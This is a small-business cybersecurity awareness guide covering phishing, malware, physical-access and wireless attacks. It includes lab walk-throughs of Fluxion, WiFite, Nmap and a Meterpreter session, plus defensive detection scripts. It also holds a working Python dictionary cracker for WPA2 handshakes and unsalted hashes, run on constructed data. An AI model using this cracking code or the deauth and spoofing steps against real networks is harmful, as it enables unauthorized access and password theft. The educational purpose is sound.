
Introduction

Business owners know potential customers are connected to the Internet at home, at work and on the go. Smartphones, tablets, laptops, desktops, televisions, gaming consoles, automobiles and appliances are all devices that connect people, and their money, to a world-wide market. Just as the Internet changed the game for businesses, it also opened the world up to attack by a new breed of cyber-criminal. These hackers use the Internet from remote locations to attack networks and devices all over the world.

Over the years, criminals have preferred to target businesses over individuals because businesses hold more profitable information to steal. The evening news is filled with stories of data breaches and corporations being attacked for data such as credit card numbers, social security numbers and financial institution information. But over the last few years, hackers have realized that large companies are investing heavily in cybersecurity, implementing the latest intrusion detection technology and hiring teams of information security professionals to protect their data, devices and networks. That realization has placed a new target in their sights: the small business.

According to customer surveys conducted by Towergate Insurance (2017), 97% of their small business customers did not make improving online security a priority, 82% do not think they are targets of attackers because they don't have anything worth stealing, 32% do not believe they will suffer revenue loss from a day's worth of downtime after an attack, 31% don't have an action plan to respond to security breaches, 24% think cyber security costs too much, and finally, 22% admit they wouldn't know where to start when it comes to implementing security.

Why are small businesses targets of cyber-crime?

Do most small business owners know they are now the main target? The answer is a resounding no. In an article discussing the rise of attacks targeting small businesses, Smith (2016) points out that cyber security experts say one of the most dangerous phrases used by small businesses is: "It'll never happen to us." In this year's Internet Security Threat Report, Symantec (2016) found that three out of every five cyber-attacks targeted small businesses. That is a huge increase, and looking at the data from Symantec over the last five years, criminals are focusing more and more on small businesses for their targeted attacks.

It is easy to understand why many small businesses feel they wouldn't be targeted. They believe they are too small and hackers would not be interested in what they do, when the opposite is true. Hackers know that small businesses tend to have weaker defenses than large corporations. By their very nature, thriving small businesses are innovative and niche, which again is very attractive to the bad guys, who may be interested in customer data and intellectual property and know exactly how to pick out the weak targets.
Why should small businesses secure their network and devices?

Examples of small businesses getting hacked with disastrous results are discussed in an article from My Digital Shield (2015). The first example covers a NYC mannequin maker that had more than $1.2M stolen from its accounts as the result of a hack into its online transactions. The company kept getting error messages when it tried to make online payments and didn't realize the site it was trying to pay on was a spoofed copy of the actual website; the payments were being taken and dispersed into four other banks, then on to other banks from there.

Another example describes the owner of two small magazine shops in Chicago, who was notified by a credit card company that a data breach had sent his customers' credit card information to Russia. "Who would want to break into us?" the owner asked, after determining that the breach cost his business almost $22,000.

A Bellingham, Washington burger joint owner was hacked twice over a two-year period, due to the lack of any security tools or configurations. The credit card company shut off his account and seized money from incoming payments, and the owner was forced to close, even after spending $12,000 on an investigation and remediation payments.

According to the U.S. Department of Health & Human Services (2010), the theft of a single unencrypted laptop led to a small Massachusetts provider having to settle a case for $1.5 million for violating HIPAA privacy and security rules. Data breaches cost much more than just money; they damage reputations. Losing trust could cost not only current partners and customers, but future customers and business partnerships as well.


What threats do small businesses face from cyber-criminals?

The main goal of this Cyber Security Awareness Guide is to give small business owners an educational reference to help protect their company and its assets. Simply being aware that the business is a target and knowing the methods attackers use will reduce the chances of a successful breach.

Malware - Malware is a broad term covering several types of computer code with malicious intent, focused on destroying something on a computer or stealing data. Malware is often introduced to a system via email attachments, embedded in software downloads, or through unpatched operating system vulnerabilities. Some examples are:

o Trojan - A Trojan horse or Trojan is malware disguised as legitimate software, commonly a file given the same name as the operating system file it replaces.

o Virus - A computer virus spreads by copying itself into program files, moving from one computer to another, infecting systems and flooding networks as it travels. Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program.

o Worm - Computer worms are similar to viruses in that they replicate copies of themselves and can cause the same type of damage, but they do not require a host program to spread.

o Spyware - Spyware is malware generally attached to downloadable files without the user's knowledge, to capture keystrokes, passwords or other data.


Example: Ever seen a popup warning that the system has been infected and software needs to be downloaded to clean it? Or a popup stating "Congratulations, you have won a free ..."? These are traps used by hackers, who often embed the software into websites most users should avoid, such as free movie or music download sites. If a user isn't aware, they could panic, install the real malware payload and basically give away control of their own system, thinking they were fixing a problem when they have just made it far worse.


Phishing - Phishing is the attempt to gather usernames, passwords, credit card numbers or other sensitive information by presenting a malicious link in a seemingly legitimate email. The best way to combat phishing is to learn how to recognize it.

Examples: One of the most popular email phishing schemes is to spoof what looks like an official email from a prominent bank. It happens so often that Bank of America (2017), in order to protect its customers and others, set up an Online Banking Email Fraud page on its website to warn of this malicious activity:


According to PhishTank (2016), here are some things to look for in a phishing email:

1. Generic greeting. To save time, Internet criminals send phishing emails in large batches and use generic greetings like "Security Alert" or "Generic Bank Name Customer" so they don't have to type out all the recipients' names and send emails one by one.

2. Spoofed link. Even if a link has a recognizable name, that doesn't mean it leads to the real organization. Hover the mouse over the link and check that the destination matches what appears in the email. If there is a discrepancy, don't click the link. PhishTank also advises that websites where it is safe to enter personal information begin with "https" (the "s" stands for secure) and that you should not proceed if "https" is absent. The reverse is not true, however: a phishing site can obtain a certificate and show "https" and a padlock just as easily, so the padlock only says the connection is encrypted, not who is on the other end. The domain name in the address bar is what has to match.

Example:
3. Links to fake account pages. The point of a phishing email is to trick someone into providing personal information. If an email requesting personal information is received, it is most likely a phishing attempt. In this sample, the email sends the victim to a fake Google page in order to steal their login name and password. The same is done with fake banking pages and social media sites like Facebook or Twitter.

Example:

4. Sense of urgency. Internet criminals try to elicit personal information quickly by convincing the user that something has happened that requires an immediate response. The faster they get the information, the faster they can move on to another victim.
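
The four checks above can be applied mechanically. The script below is an added example written for this guide (it is not from PhishTank or Bank of America): it parses the HTML body of a message, extracts each link's visible text and real destination, and applies the generic-greeting, spoofed-link, credential-request and urgency checks. The two sample messages, the bank name and the domains are constructed; ".example" is a reserved top-level domain. The "unencrypted link" finding is deliberately reported separately, since its absence proves nothing about who runs the site.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample messages (not real mail). The bank name and domains are made
# up; ".example" is a reserved TLD. The first is a typical "account alert" lure,
# the second a benign statement notice from the same bank.
PHISHING_MAIL = {
    "subject": "URGENT: your account will be suspended",
    "body": (
        "<p>Dear Valued Customer,</p>"
        "<p>Unusual activity was detected. Please verify your password within 24 hours "
        "or your account will be locked.</p>"
        '<p><a href="http://smallbizbank-secure.example.net/login">'
        "https://www.smallbizbank.example/signin</a></p>"
    ),
}
LEGIT_MAIL = {
    "subject": "Your March statement is ready",
    "body": (
        "<p>Hello Jane Doe,</p>"
        "<p>Your statement is available. Sign in at our site as usual.</p>"
        '<p><a href="https://www.smallbizbank.example/statements">View statements</a></p>'
    ),
}

GENERIC_GREETING = re.compile(r"^\s*(dear|hello|hi)\b[^,\n]*\b(customer|user|member|client|account holder)\b", re.I)
LOOKS_LIKE_URL = re.compile(r"^(https?://)?([a-z0-9-]+\.)+[a-z]{2,}(/|$)", re.I)
URGENCY = re.compile(r"\b(urgent|immediately|within \d+ hours|suspended|locked|final notice)\b", re.I)
CREDENTIAL_ASK = re.compile(r"\b(verify|confirm|update|validate)\b.{0,40}\b(password|account|login|card|ssn)\b", re.I | re.S)


class MailText(HTMLParser):
    """Collect the visible text of an HTML body plus every (href, anchor text) pair."""

    def __init__(self):
        super().__init__()
        self.text, self.links = [], []
        self._href, self._anchor = None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._anchor = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._anchor.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._anchor).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL or of a bare domain used as link text ('www.x.example/a' -> 'www.x.example')."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def analyze(mail):
    """Apply the PhishTank-style checks to one message; returns a list of findings (empty = nothing seen)."""
    parser = MailText()
    parser.feed(mail["body"])
    text = "\n".join(t for t in parser.text if t.strip())
    findings = []

    if GENERIC_GREETING.search(text):                       # check 1: generic greeting
        findings.append("generic greeting: " + text.splitlines()[0])

    for href, anchor in parser.links:                       # check 2: spoofed link
        if LOOKS_LIKE_URL.match(anchor) and host_of(anchor) != host_of(href):
            findings.append(f"spoofed link: text shows {host_of(anchor)} but points to {host_of(href)}")
        if urlparse(href).scheme != "https":                # weak signal on its own
            findings.append("unencrypted link: " + href)

    if m := CREDENTIAL_ASK.search(text):                    # check 3: asks for credentials
        findings.append("credential request: " + m.group(0))

    if m := URGENCY.search(mail["subject"] + "\n" + text):  # check 4: sense of urgency
        findings.append("urgency: " + m.group(0))
    return findings


if __name__ == "__main__":
    for name, mail in ("phishing", PHISHING_MAIL), ("legitimate", LEGIT_MAIL):
        print(name, analyze(mail) or ["no findings"])
```

The spoofed-link check is the one that matters most in practice: it compares the host the text claims against the host the browser would actually open, which is exactly what hovering over the link shows a careful reader.
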
Password Attacks: There are several types of password attacks:

o Fake websites: Spoofed sites that look real but are not. Often a user clicks a link in an email, on a website or even in a social media messenger that redirects them to a fake page that looks very real.

o Brute force: A program guesses passwords until the hacker gets in, trying combinations of dictionary words and character sets. Cain and Abel is one such password cracker. Should a thief steal a laptop, it would be easy to boot it from a USB drive running hacking tools, dump the local password hashes and run the cracker against them for an easy logon later.


Mobile Smart Devices - The New Threat

Over the years, the primary targets of hackers have been the servers, desktops and laptops of businesses, because these have been the primary devices connected to the Internet. In much the same way cyber-criminals redirected their attack focus from large businesses to small, cybersecurity analysts say nefarious forces are increasingly turning their attention to the most personal computer one owns, the device carried everywhere and trusted with some of the most sensitive secrets: the mobile smart device.

"Over the last two years or so, we have seen a huge influx in the number of hackers targeting smartphones," says Roel Schouwenberg, principal security researcher for Kaspersky Labs, to CBC News (2014) in a story discussing how these devices are becoming a prime target for criminal hackers.

Mobile smart devices are small electronic gadgets that put the power of a computer in the palm of a hand, connected to other devices or networks via wireless protocols such as Bluetooth, NFC, Wi-Fi and 3G/4G cellular service. Smartphones and tablets carry the most personal and financial information of the small business owner, contained in contact lists, online shopping, mobile banking and credit card apps.

Internet access via a mobile smart device allows small business owners to reach cloud storage, where they may keep important business documents, contracts, bids, service level agreements and much more. Many small business owners also use smartphones and tablets to process credit cards using third-party magstripe and smart-chip readers and installed mobile apps. The breach of one of these devices by criminals would be devastating to a small business and its customers.


Hackers have started targeting these devices in several ways. Sometimes it is malware implanted using the same email attacks directed at personal computers, delivered via mobile email apps. SMiShing (SMS phishing) is another common attack method: sending an SMS text that looks like an account notification, in the hope that the device owner will tap the link and download malware to the phone.

In a review of Mobile Malware Evolution 2016, Unuchek (2017) reported that Kaspersky Labs detected 8,526,221 malicious installation packages, 128,886 mobile banking Trojans and 261,214 mobile ransomware Trojans.

The trends of 2016 were:

o Growth in the popularity of malicious programs using super-user rights, primarily

advertising Trojans.

o Distribution of malware via Google Play and advertising services.

o Emergence of new ways to bypass Android protection mechanisms.

o Growth in the volume of mobile ransomware.

o Active development of mobile banking Trojans.


This year, Unuchek (2017) of Kaspersky Labs reported that they have started calculating the distribution of mobile software based on the number of detected installation packages.

In 2016, the volume of mobile Trojan-Ransomware increased noticeably, both in the number of users attacked and in the number of installation packages detected.


Latest Hacking News (2017) posted an article showing images of a Samsung Galaxy S7 hacked with ransomware, where the victim was infected while using the popular Facebook Messenger app. A penalty notice warned the victim that they would be reported as having child sexual abuse content on the phone unless a ransom was paid via the online payment platform PaySafeCard.

Physical Access

What if a thief breaks into a small business owner's car or home and steals their laptop? What if a criminal gains access to a home office through a break-in, or through social engineering tactics such as posing as a city inspector, a gas company employee claiming there is a gas leak, or a cable company technician there to fix the wireless problem that he created himself by jamming the wireless access point?

Even if a computer has a password, that doesn't mean a hacker won't be able to get at the data. The login password only guards the running operating system. Simply inserting and booting from a USB key grants access to everything on a computer that hasn't been properly configured: the disk must be encrypted (BitLocker, FileVault or LUKS, depending on the platform), and the firmware should be set to boot only from the internal drive, with a firmware password so the boot order cannot be changed.


Once the computer has been booted via USB, the attacker has full access to the hacking toolkit on the USB drive as well as all of the files on the hard drive. In the screenshot, access reaches all the way down to the Documents folder containing our small business owner's vital working documents. These can be copied to the USB drive for later review. The hacker can also embed malware into the system or into any of the files on it, and if those files are emailed to another location, the hacker has a backdoor there too.
If granted physical access to a device, a hacker could place a keylogger into an open USB port, plant a wired or wireless server, or boot an unencrypted laptop or desktop to steal data. Many criminals use social engineering skills to put themselves into positions that allow physical access, such as posing as cable installers, maintenance personnel, telephone or power workers, or potential customers. Physical security is every bit as important as cybersecurity.

o Keyloggers - Track keystrokes, including user IDs and passwords. Would the common computer user notice a little key grabber plugged in between the computer and the keyboard?

o USB attack devices - By emulating combinations of trusted USB devices, such as gigabit Ethernet, serial, flash storage and keyboards, these devices trick computers into divulging data, giving up documents, installing backdoors and many more exploits. The Hak5 Bash Bunny is the best known; it is often lumped in with keyloggers, but it is really a scripted USB attack platform that carries multiple payloads. Plugged into a long cable connected to a USB port in the back of a computer case, it is easily hidden and goes unnoticed.

A Raspberry Pi Zero W (right) running Kali Linux is a portable, fully operational hacking PC. Easily hidden in an office and running wirelessly, this device can access information on the machine and transmit it over the Internet anywhere in the world. Running PoisonTap (left), it can attack even locked workstations: it presents itself as a USB Ethernet adapter, and the locked machine obligingly routes its network traffic through it.
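
A passive inline key grabber does not show up to the host at all and has to be found by looking at the cable, but an injection device like the Bash Bunny or a PoisonTap Pi has to enumerate with the operating system, and the kernel logs that. The script below is an added example written for this guide (not a Hak5 or PoisonTap tool) of what a defender can look for: it parses a constructed dmesg excerpt (made-up vendor IDs and product names) and flags any USB port where one device presents a keyboard together with mass storage or a USB Ethernet interface, or where a second keyboard appears.

```python
import re
from collections import defaultdict

# Constructed kernel log excerpt in dmesg format (not captured from a real machine;
# vendor/product IDs and names are made up). Port 1-1 is an ordinary keyboard.
# Port 1-2 announces itself as a flash drive but also enumerates a keyboard and a
# USB Ethernet interface, which is how HID-injection / network-hijack gadgets
# such as the Bash Bunny or PoisonTap appear to the host.
SAMPLE_DMESG = """\
[   12.10] usb 1-1: new full-speed USB device number 3 using xhci_hcd
[   12.11] usb 1-1: New USB device found, idVendor=0a0a, idProduct=0001, bcdDevice= 1.00
[   12.12] usb 1-1: Product: Office Keyboard
[   12.20] input: Office Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.0/0003:0A0A:0001.0001/input/input5
[   12.21] hid-generic 0003:0A0A:0001.0001: input,hidraw0: USB HID v1.10 Keyboard [Office Keyboard] on usb-0000:00:14.0-1/input0
[  901.30] usb 1-2: new high-speed USB device number 4 using xhci_hcd
[  901.31] usb 1-2: New USB device found, idVendor=1234, idProduct=abcd, bcdDevice= 1.00
[  901.32] usb 1-2: Product: USB Flash Disk
[  901.40] usb-storage 1-2:1.0: USB Mass Storage device detected
[  901.45] input: USB Flash Disk as /devices/pci0000:00/0000:00:14.0/usb1/1-2/1-2:1.1/0003:1234:ABCD.0002/input/input6
[  901.46] hid-generic 0003:1234:ABCD.0002: input,hidraw1: USB HID v1.11 Keyboard [USB Flash Disk] on usb-0000:00:14.0-2/input1
[  901.50] rndis_host 1-2:1.2 usb0: register 'rndis_host' at usb-0000:00:14.0-2, RNDIS device, 02:11:22:33:44:55
"""

PRODUCT = re.compile(r"usb ([\d.-]+): Product: (.+)$")
STORAGE = re.compile(r"usb-storage ([\d.-]+):\d+\.\d+: USB Mass Storage")
ETHERNET = re.compile(r"(?:rndis_host|cdc_ether|cdc_ncm) ([\d.-]+):\d+\.\d+ \S+: register")
INPUT_DEV = re.compile(r"input: .+? as /devices/.*?/usb\d+/([\d.-]+)/[^/]+/([^/]+)/input/input\d+")
HID_KIND = re.compile(r"hid-generic (\S+): .*USB HID v[\d.]+ (\w+) \[")


def parse_usb_devices(log):
    """Group dmesg lines by USB port ('1-2') and record which device classes each port exposes."""
    devices = defaultdict(lambda: {"name": "?", "classes": set()})
    # hid-generic lines carry the HID id and the kind (Keyboard/Mouse); the input:
    # line carries the same id in its sysfs path, which is what ties it to a port.
    hid_kind = {m.group(1): m.group(2).lower() for m in map(HID_KIND.search, log.splitlines()) if m}
    for line in log.splitlines():
        if m := PRODUCT.search(line):
            devices[m.group(1)]["name"] = m.group(2).strip()
        elif m := STORAGE.search(line):
            devices[m.group(1)]["classes"].add("storage")
        elif m := ETHERNET.search(line):
            devices[m.group(1)]["classes"].add("ethernet")
        elif m := INPUT_DEV.search(line):
            port, hid_id = m.group(1), m.group(2)
            devices[port]["classes"].add(hid_kind.get(hid_id, "hid"))
    return dict(devices)


def analyze_usb_log(log):
    """Return (port, name, reason) for devices that do not behave like what they claim to be."""
    devices = parse_usb_devices(log)
    findings = []
    for port, dev in sorted(devices.items()):
        classes = dev["classes"]
        if "keyboard" in classes and classes & {"storage", "ethernet"}:
            extra = "/".join(sorted(classes - {"keyboard"}))
            findings.append((port, dev["name"], f"types like a keyboard but also presents {extra}: HID-injection platform pattern"))
        elif "ethernet" in classes and "storage" in classes:
            findings.append((port, dev["name"], "flash drive that also brings up a network interface: PoisonTap pattern"))
    keyboards = [p for p, d in devices.items() if "keyboard" in d["classes"]]
    if len(keyboards) > 1:
        findings.append(("*", ", ".join(sorted(keyboards)), "more than one keyboard enumerated; check for an inline key grabber or injector"))
    return findings


if __name__ == "__main__":
    for port, name, reason in analyze_usb_log(SAMPLE_DMESG):
        print(f"[{port}] {name}: {reason}")
```

On a real machine the same regexes can be run over `journalctl -k` output; the point is that a "flash drive" which also types or hands the machine a new default route is never legitimate, and the kernel tells you when one appears.
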


Examples of real hacking techniques.

The most effective way to demonstrate weaknesses to a small business is to use the same mindset, tools and methods as cybercriminals and hackers. This guide demonstrates how devices and networks are compromised by attacking systems set up to mirror the environment many home-based businesses use to conduct their day-to-day business.

Attacking the Network

Find the target with WarDriving: Using a laptop with a wireless adapter and a USB GPS receiver is the old-school, tried and true way for a hacker to drive around in a vehicle, surveying the area for wireless networks and evaluating their security.

A more modern technique is to use a smartphone, which comes with wireless and GPS built in. The collected information is stored in a database for later analysis. The data can be sorted and imported into a mapping application like Google Earth to give hackers a roadmap, or uploaded to websites where hackers collaborate and share information with each other.

This information is then publicly available, not just to hackers, but to people looking for open access points from which to download or upload illegal content or send spam email. When the authorities conduct their investigation, the trail leads to some innocent home or business owner instead of the perpetrator.

Wireless Password Theft - Password theft on wireless networks is generally achieved in two ways:

o Fluxion - Wireless Access Point Spoofing: Spoofing works by presenting users with what looks like a legitimate Wireless Access Point (WAP), when in reality it's just a laptop with two wireless cards playing man in the middle. The rogue WAP presents what appears to be the real SSID and tricks users into connecting to it. Once the user enters the password to connect, it is stored by the hacker.

o WiFite - Brute Force Cracking: The stealthy way to crack a wireless password is to capture real network traffic between a legitimate user and the WAP. The cracking tool sends a deauthentication frame to a client, which kicks it off the wireless network, then captures the encrypted handshake when the client authenticates again. Those packets are taken back to a more powerful computer, which runs brute-force tools against dictionary lists until the password is found.

Footprinting: Once the hacker has access to the internal network, information gathering begins by using scan tools to find the devices on it. Once devices are detected, tools are run to find the operating system type so targeted payload attacks can be launched. Nmap is the tool used to find devices and determine the operating system.

Attack Systems: Attack the system with live exploits to gain access by delivering a payload that lets a hacker control the system. The demonstration covers the AFTER of the attack so as not to spread live attack methods and techniques.


WarDriving Demonstration: Kismet

A Kali Linux laptop running Kismet, connected to a TP-Link wireless adapter and a GlobalSat USB GPS receiver, wardriving a neighborhood to collect wireless access point information and GPS locations.

The collected data can be extracted from the wardriving database and imported into a mapping program like Google Earth.

Modern wardrivers keep it simple, using smartphones that come with wireless and GPS built in. While not getting the same range as the old-school laptop, a smartphone running WiGLE WiFi is far more discreet and effective.

Once the data is captured, it can easily be uploaded to wigle.net, a site used by wardrivers to collaborate and share captured data.


Wireless Access Point Spoofing Demonstration: Fluxion

Fluxion is used to trick a user into giving away their password: it captures information from the real wireless access point, then jams it while putting up a fake access point for the victim to enter their password into. In this demonstration, Fluxion has targeted SmallBizDemo.

The target wireless access point has been identified; once the deauth command is sent, the Android device is kicked off the real access point.

When the device tries to reconnect to the real WAP, it sends the encrypted four-way handshake, which Fluxion captures.

When the check handshake option is selected, the information gathered from the WAP is displayed. Then a fake access point is created with the information gathered, jamming the original access point while presenting the client with a spoofed SSID.

When presented with the fake WAP, the victim will attempt to enter the ACTUAL password, thinking they are connecting to the real AP.

Fluxion then checks the password entered by the victim against the captured encrypted handshake and verifies that it is the real one; a wrong entry simply fails the check.
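
The verification step Fluxion performs here, the wordlist attack described under the Brute Force bullet in Password Attacks, and the WiFite bullet above are all the same computation, run once per candidate. The Python below is an added example written for this guide, not code from Fluxion, WiFite or Cain and Abel: it implements the WPA2-PSK key derivation from IEEE 802.11i (PBKDF2-HMAC-SHA1 with the SSID as salt, then the PRF-512 key expansion and the EAPOL MIC check), runs a small constructed wordlist against a simulated handshake capture for SmallBizDemo, and, for the stolen-laptop case, runs the same loop against an unsalted hash. The passphrase, MAC addresses, nonces, hash and wordlist are all constructed for the example; nothing here is captured from a real network.

```python
import hashlib
import hmac
import os

# Constructed miniature wordlist; real attacks use lists with millions of entries.
WORDLIST = ["123456", "password", "letmein", "welcome1", "sunshine2015", "Smallbiz!", "qwerty"]

# ---- Case 1: unsalted password hash copied from a stolen, unencrypted laptop ----
# Constructed: the local account's password stored as a bare SHA-256 digest. Any
# unsalted, fast hash (NTLM, MD5, SHA-1, ...) falls to exactly the same loop.
STOLEN_HASH = hashlib.sha256(b"letmein").hexdigest()


def crack_unsalted_hash(target_hex, wordlist):
    """Hash every candidate and compare; returns the matching word or None."""
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target_hex:
            return word
    return None


# ---- Case 2: WPA2-PSK four-way handshake captured after a deauth ----
def wpa2_pmk(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed tables only work per network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512 from 802.11i; bytes 0-15 of the PTK are the KCK used for the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        msg = b"Pairwise key expansion" + b"\x00" + data + bytes([i])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_wpa2(ssid, capture, wordlist):
    """Offline dictionary attack: for each candidate derive PMK -> PTK -> KCK and
    check whether it reproduces the MIC the client sent in handshake message 2."""
    for word in wordlist:
        kck = wpa2_ptk(wpa2_pmk(word, ssid), capture["aa"], capture["spa"],
                       capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return word
    return None


def simulate_capture(ssid, passphrase):
    """Constructed stand-in for a pcap: random MACs and nonces plus a minimal
    EAPOL-Key message 2 (95-byte RSN key descriptor, MIC field zeroed) and the MIC
    a real client holding `passphrase` would have put in it."""
    aa, spa = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol = (b"\x01\x03\x00\x5f"             # EAPOL version 1, type Key, body length 95
             + b"\x02\x01\x0a\x00\x10"       # descriptor RSN, key info (pairwise|MIC|v2), key length 16
             + b"\x00" * 8 + snonce          # replay counter, SNonce
             + b"\x00" * (16 + 8 + 8)        # key IV, RSC, key ID
             + b"\x00" * 16 + b"\x00\x00")   # MIC (zeroed for MIC computation), key data length
    kck = wpa2_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    print("laptop hash ->", crack_unsalted_hash(STOLEN_HASH, WORDLIST))
    cap = simulate_capture("SmallBizDemo", "sunshine2015")
    print("SmallBizDemo ->", crack_wpa2("SmallBizDemo", cap, WORDLIST))
```

Two things worth noticing: the 4096 PBKDF2 iterations make each WPA2 guess thousands of times more expensive than a guess against the bare laptop hash, and the attack never touches the network once the handshake is in hand, so a passphrase that is not in any wordlist is the only thing standing between the capture and the key.
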


Brute Force Cracking Demonstration: WiFite

WiFite is an automated wireless attack tool which can mount multiple attacks against WEP- and WPA-protected access points. WiFite excels at:

o sorting targets by signal strength, cracking the closest access points first

o automatically de-authenticating clients of hidden networks to reveal their SSIDs

o filtering to specify exactly what to attack: WEP, WPA or both

o an anonymous feature that changes the MAC address to a random one before attacking, then changes it back when the attacks are complete

o smart WPA de-authentication, cycling between all clients and broadcast deauths

o displaying a session summary at exit, showing cracked keys

o saving all recovered passwords to cracked.txt

Start WiFite and choose a network adapter capable of monitor mode. When monitoring starts, a list of access points is presented; in this case the SmallBizDemo wireless access point is the target of the attack.

In just minutes, the WEP encryption key is attacked and recovered, demonstrating how easy it is to break WEP. Note that this is not really a brute-force result: a WEP key is recovered statistically from captured traffic regardless of how long or random it is, which is why WEP has been deprecated since 2004 and should not be used at all. A WPA/WPA2 key, by contrast, has to be guessed from a wordlist against the captured handshake, so a long random passphrase defeats the dictionary step.


Footprinting: Gathering information about the target by running scan tools against network and system ports with Nmap. The process begins by running Nmap on the compromised network to gather information about the systems, scanning the entire subnet.

The HP computer with the IP address 10.0.0.6 will be the target, as it is probably a Windows computer. Running Nmap against that IP address confirms the suspicion.

Now that a target has been chosen and an often-exploitable operating system has been found, the attack switches to methods specific to that system, delivered over the wireless network.
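
As an added example (not from the guide's demonstration files), the following Python parses the grepable output format Nmap writes with -oG and picks out the hosts an attacker would go after first: Windows OS guesses and hosts exposing SMB, NetBIOS, MS-RPC, RDP or Telnet. The sample output is constructed to match the walk-through's 10.0.0.0/24 network and is not a real scan; the same script run on a business's own scan output shows the owner exactly what the attacker sees.

```python
# Constructed grepable output, in the tab-separated "Key: value" layout that
# `nmap -O -oG scan.gnmap 10.0.0.0/24` writes; the hosts and services are made up
# to match the walk-through's network and do not come from a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.40 scan initiated Sat Apr  1 10:00:00 2017 as: nmap -O -oG scan.gnmap 10.0.0.0/24
Host: 10.0.0.1 (gateway.lan)\tStatus: Up
Host: 10.0.0.1 (gateway.lan)\tPorts: 53/open/tcp//domain///, 80/open/tcp//http///\tIgnored State: closed (998)\tOS: Linux 3.2 - 4.6\tSeq Index: 259\tIP ID Seq: All zeros
Host: 10.0.0.6 ()\tStatus: Up
Host: 10.0.0.6 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (997)\tOS: Microsoft Windows 7|2008\tSeq Index: 261\tIP ID Seq: Incremental
Host: 10.0.0.18 (kali)\tStatus: Up
Host: 10.0.0.18 (kali)\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)\tOS: Linux 4.4 - 4.9\tSeq Index: 258\tIP ID Seq: All zeros
# Nmap done at Sat Apr  1 10:00:40 2017 -- 256 IP addresses (3 hosts up) scanned in 40.12 seconds
"""

# Services the attack chain in this guide rides on: exposing them to the wireless
# LAN is what turns "a Windows box on the network" into a target.
RISKY_PORTS = {135: "MS-RPC", 139: "NetBIOS", 445: "SMB", 3389: "RDP", 23: "Telnet"}


def parse_gnmap(text):
    """Merge the 'Status' and 'Ports' lines for each host into one record."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip, _, hostname = fields[0][len("Host: "):].partition(" ")
        rec = hosts.setdefault(ip, {"hostname": hostname.strip("()"), "status": None, "ports": [], "os": None})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                rec["status"] = value
            elif key == "OS":
                rec["os"] = value
            elif key == "Ports":
                # each entry is port/state/proto/owner/service/rpc/version/
                for entry in value.split(", "):
                    port, state, proto, _owner, service = entry.split("/")[:5]
                    if state == "open":
                        rec["ports"].append((int(port), proto, service))
    return hosts


def triage(hosts):
    """Pick the hosts an attacker (or a defender running the same scan) would look at first."""
    flagged = []
    for ip, rec in sorted(hosts.items(), key=lambda kv: tuple(int(o) for o in kv[0].split("."))):
        if rec["status"] != "Up":
            continue
        exposed = [RISKY_PORTS[p] for p, _, _ in rec["ports"] if p in RISKY_PORTS]
        windows = bool(rec["os"]) and "Windows" in rec["os"]
        if windows or exposed:
            reasons = (["OS guess: " + rec["os"]] if windows else []) + \
                      (["exposes " + ", ".join(exposed)] if exposed else [])
            flagged.append((ip, "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for ip, why in triage(parse_gnmap(SAMPLE_GNMAP)):
        print(ip, "->", why)
```

The two Nmap runs the walk-through performs, a subnet sweep followed by an OS fingerprint of one host, are both captured in one -oG file, so a single parse gives the same "pick the Windows box with SMB open" decision the attacker made by eye.
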

Attack Systems: Attack the system with live exploits to gain access by delivering a payload that lets a hacker control the system. The demonstration covers the AFTER of the attack so as not to spread live attack methods and techniques.

Once the attack has occurred and the backdoor into the system is open, the hacker has complete Meterpreter shell access as well as his complete hacking toolkit. This screenshot shows the exploit running in a background process on the target computer, having opened a session back to the hacking system at 10.0.0.18.


Here the attacker is connected and at the root of the C: drive. Changing directory to Users\Mama\My Documents would grant access to the same small business owner files shown above in the physical access attack, except this time the hacker is sitting in his car across the street, free of any fear of getting caught.

With this kind of remote access, the attacker can launch any number of attacks on the small business owner. He could inject other malware to infect customers or partners of the business, or hijack the system with ransomware by encrypting the hard drive and locking the owner out.

The screenshot below shows a scary option for a cybercriminal: the Meterpreter webcam commands. What kind of compromising material could be captured by snapping pictures or starting a video stream from the web camera?

If a business suspects that it has been the victim of a cyberattack:

o Inform local law enforcement or the state attorney general.

o Report stolen finances/identities and other cybercrimes to the Internet Crime Complaint Center: http://www.ic3.gov/

